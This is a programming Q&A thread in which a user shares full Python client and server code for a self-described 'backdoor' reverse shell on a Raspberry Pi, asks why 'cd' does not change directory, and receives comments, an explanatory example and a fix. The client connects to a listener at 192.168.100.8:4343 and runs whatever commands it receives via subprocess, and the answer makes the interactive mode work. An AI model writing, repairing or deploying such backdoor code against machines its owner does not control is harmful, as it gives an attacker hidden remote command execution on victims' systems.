
I am building a 'backdoor' for my Raspberry Pi, and I have a problem: after creating the interactive shell, I can't change directory.

I edited my original code to make it short. I have been trying to resolve this problem for around 2-3 hours.

python3 - cd is not working in reverse shell - Not Working

Backdoor Shell doesn't allow me to change Directory - Not Working

Client:

import socket, json
import os
import subprocess
import sys

SERVER_HOST = '192.168.100.8'
SERVER_PORT = 4343
BUFFER_SIZE = 1024 * 128
SEPARATOR = "<sep>"


s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))

snd = []

data = json.dumps({"cwd": os.getcwd(), "usr": os.getlogin()})
s.send(data.encode())

while True:
    command = s.recv(BUFFER_SIZE).decode()
    if command == 'shell':
        # interactive mode: this inner loop is the only place 'cd' is handled
        while True:
            command = s.recv(BUFFER_SIZE).decode()

            if command.lower() == "exit":
                break
            if command.startswith("cd "):
                # 'cd' must change this process's own directory; a 'cd' run
                # through subprocess only affects the short-lived child shell
                try:
                    os.chdir(f'{os.getcwd()}/{str(command[3:])}')
                except FileNotFoundError as e:
                    output = str(e)
                else:
                    output = ""
            else:
                output = subprocess.getoutput(command)
            cwd = os.getcwd()
            message = f"{output}{SEPARATOR}{cwd}"
            s.send(message.encode())
            if command == 'exit':
                break
    else:
        # single-command mode: no 'cd' handling here
        if command.lower() == "exit":
            break
        else:
            output = subprocess.getoutput(command)
        cwd = os.getcwd()
        message = f"{output}{SEPARATOR}{cwd}"
        s.send(message.encode())
s.close()

Server:

import socket,json
import os

SERVER_HOST = "192.168.100.8"
SERVER_PORT = 4343
BUFFER_SIZE = 1024 * 128
SEPARATOR = "<sep>"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((SERVER_HOST, SERVER_PORT))
s.listen()

while True:
    client_socket, client_address = s.accept()

    # first message from the client: its starting cwd and user name as JSON
    data = json.loads(client_socket.recv(BUFFER_SIZE).decode())
    while True:
        print("TYPE SHELL")
        tmp = input(f"[*] Enter command: ")
        if tmp.lower() == 'shell':
            print("[*] Opening interactive shell")
            command = input(f"{data['cwd']} $: ")
            while command != 'exit':
                if not command.strip():
                    # empty line: prompt again instead of looping on the same value
                    command = input(f"{data['cwd']} $: ")
                    continue
                client_socket.send(command.encode())
                output = client_socket.recv(BUFFER_SIZE).decode()
                results, cwd = output.split(SEPARATOR)
                print(results)
                command = input(f"{data['cwd']} $: ")
            print('[!] Closing interactive shell')

This is what I see in the shell:

/home/pi $: ls
1
Bookshelf 
client.py 
Desktop
Documents 
Downloads 
Music
Pictures 
Public
rm.sh
Templates 
Videos
/home/pi $: cd 1

/home/pi $: pwd
/home/pi
/home/pi $: mkdir 2 && cd 2 && touch 1 && ls && pwd 
1
/home/pi/2
/home/pi $: 
  • Where is the code that splits up a command line containing `&&`? – Barmar Jun 17 '22 at 21:42
  • it doesn't split it – mikef0x Jun 17 '22 at 21:52
  • That's why it doesn't work. You have `cd 2` after `&&`, but your code only checks for `cd` at the beginning of the command. `if command.startswith("cd "):` – Barmar Jun 17 '22 at 21:53
  • No, I typed that to check if the command is working. I mean only `cd Directory` is not working – mikef0x Jun 17 '22 at 21:54
  • `cd 1` must work, it just doesn't change directory, os.chdir is not working – mikef0x Jun 17 '22 at 21:56
  • The prompt shows `data['cwd']`. You never update this with the response from the client. – Barmar Jun 17 '22 at 22:07
  • that is not the problem right now, I will fix that later; anyway, pwd shows that I am in the same directory – mikef0x Jun 17 '22 at 22:09
  • I'm trying to run the code here, but I'm confused about how to use it. First I have to type `shell` to get the server to start the interactive shell. Then I need to type it again to send `shell` to the client, so it will start its reverse shell. Is that right? – Barmar Jun 17 '22 at 22:32
  • But when I do that, the server doesn't prompt for another command, because it's waiting for something from the client, but the client doesn't send a response to the `shell` command. It's waiting for another input. So it's deadlocked. – Barmar Jun 17 '22 at 22:34
  • It looks like you never entered `shell` a second time. So you never go into the inner loop on the client that looks for `cd` commands. – Barmar Jun 17 '22 at 22:36
  • you just enter `shell` one time and then just enter a command – mikef0x Jun 17 '22 at 22:37
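The `cd` handling in the question and the `&&` exchange in the comments come down to one Python fact, shown here in an added example that is not code from the question or the answer: `subprocess.getoutput()` runs the command line in a child shell, so a `cd` inside that child (alone or after `&&`) disappears when the child exits, while `os.chdir()` moves the Python process itself. `run_command` is a hypothetical helper that resolves `cd` against the current directory (relative, absolute, `~` and no argument), and `demo()` replays the session from the question inside a temporary directory so it runs offline.

```python
import os
import shutil
import subprocess
import tempfile

# Added example (not the asker's code): isolates the 'cd' logic of the
# client's inner loop and shows why a 'cd' that goes through the shell
# never changes the directory of the Python process.


def run_command(command):
    """Run one command line and return (output, cwd_after).

    'cd' is resolved in-process with os.chdir(); everything else goes to a
    throwaway child shell via subprocess.getoutput(), exactly as on the page.
    Shell quoting in the 'cd' argument is not parsed (simplification).
    """
    command = command.strip()
    if command == "cd" or command.startswith("cd "):
        target = command[2:].strip() or "~"          # bare 'cd' means home
        target = os.path.expanduser(target)
        # os.path.join keeps an absolute target as-is and appends a relative
        # one to the current directory; normpath collapses '..' and '.'.
        new_dir = os.path.normpath(os.path.join(os.getcwd(), target))
        try:
            os.chdir(new_dir)
        except (FileNotFoundError, NotADirectoryError, PermissionError) as e:
            return str(e), os.getcwd()
        return "", os.getcwd()
    # A 'cd' inside this command line only moves the child shell.
    output = subprocess.getoutput(command)
    return output, os.getcwd()


def demo():
    """Replay the question's session in a fresh temporary directory.

    Returns (base_dir, [(command, output, cwd_after), ...]).
    """
    base = os.path.realpath(tempfile.mkdtemp())   # constructed scratch dir
    start = os.getcwd()
    os.chdir(base)
    try:
        session = [
            "mkdir 1",
            "cd 1",                                  # in-process: cwd changes
            "cd ..",
            "mkdir 2 && cd 2 && touch 1 && ls",      # child shell: cwd does not
            "cd 2",
            "ls",
            "cd missing",                            # error, cwd unchanged
        ]
        results = [(cmd,) + run_command(cmd) for cmd in session]
    finally:
        os.chdir(start)
        shutil.rmtree(base)
    return base, results


if __name__ == "__main__":
    base, results = demo()
    for cmd, output, cwd in results:
        print(f"{cwd.replace(base, '<base>')} $: {cmd}")
        if output:
            print(output)
```

In the question, `mkdir 2 && cd 2 && touch 1 && ls && pwd` prints `/home/pi/2` because that `pwd` ran inside the child shell, yet the very next `pwd` on its own line still reports `/home/pi`; `demo()` reproduces that: the `&&` line creates and lists `2` but leaves the process directory where it was, and only the separate `cd 2` moves it.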

1 Answer


The server needs to send the shell command to the client when you start the reverse shell. Otherwise, the client won't go into the inner while loop that contains the code that looks for the cd command.

So add the line:

                client_socket.send("shell".encode())

before

                print("[*] Opening interactive shell")